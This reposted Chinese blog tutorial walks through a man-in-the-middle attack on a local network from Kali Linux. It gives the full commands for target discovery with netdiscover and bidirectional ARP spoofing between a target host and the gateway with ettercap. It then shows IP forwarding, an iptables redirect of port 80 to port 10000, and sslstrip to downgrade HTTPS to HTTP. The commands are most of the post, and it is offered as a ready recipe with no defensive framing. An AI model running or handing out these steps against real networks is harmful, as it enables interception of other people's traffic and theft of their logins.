码迷,mamicode.com
首页 > Web开发 > 详细

ettercap的中间人欺骗+sslstrip过滤掉https协议

时间:2017-12-22 15:04:16      阅读:584      评论:0      收藏:0      [点我收藏+]

标签:lan   定向   事件   一个   80端口   roc   lock   kali   port   

   环境准备:kali系统

  因为kali系统自带ettercap,比较方便, 不需要安装

  ifcofing命令查看当前网关 ,当前的IP是: 172.16.42.1

技术分享图片

  查找局域网所有主机

  通过netdiscover获取到当前目标IP:172.16.42.131  

技术分享图片

  启动ettercap 

  启动ettercap , wlan0为网卡端口, -T为文字显示, -M art:remote为双向arp欺骗, /172.16.42.131//为攻击的目标机器IP , /172.16.42.1//为网关地址(注, 在不同系统和不同的ettercap版本中, 参数可能不一样, 具体要看你的环境和ettercap版本)

ettercap -i wlan0 -T -M arp:remote /172.16.42.131// /172.16.42.1//

技术分享图片

  过滤https协议成http

  重新打开一个命令行窗口,分别执行下面三个命令行,

  echo 1 > /proc/sys/net/ipv4/ip_forward   开启数据重定向

  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000  开启80端口的数据转发到10000端口  

  sslstrip -l 10000  执行sslstrip欺骗,把网页中的https协议转换为http协议

echo 1 > /proc/sys/net/ipv4/ip_forward 
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -l 10000

技术分享图片

  当用户浏览的网页中包含https协议,会被转化为http协议的请求

  但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件, , 那么sslstrip就失效了

  如果用户打开网页的时候请求就是https, 会导致证书认证失败, 网页一直打不开

 

技术分享图片作者: NONO 
出处:http://www.cnblogs.com/diligenceday/ 
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329 
微信:18101055830 

ettercap的中间人欺骗+sslstrip过滤掉https协议

标签:lan   定向   事件   一个   80端口   roc   lock   kali   port   

原文地址:http://www.cnblogs.com/diligenceday/p/8076478.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!